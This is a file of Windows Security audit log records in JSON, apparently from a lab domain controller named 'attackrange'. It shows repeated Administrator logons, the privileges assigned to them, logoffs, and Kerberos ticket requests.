{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220364,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220365,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CF9B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4cf9b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220366,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CF9B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4cf9b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220367,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CF9B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4cf9b","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220368,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220369,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220370,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220371,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4DC79\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4dc79","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220372,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4DC79\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4dc79","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220373,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4DC79\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4dc79","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220374,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220375,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220376,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220377,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4DC99\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation 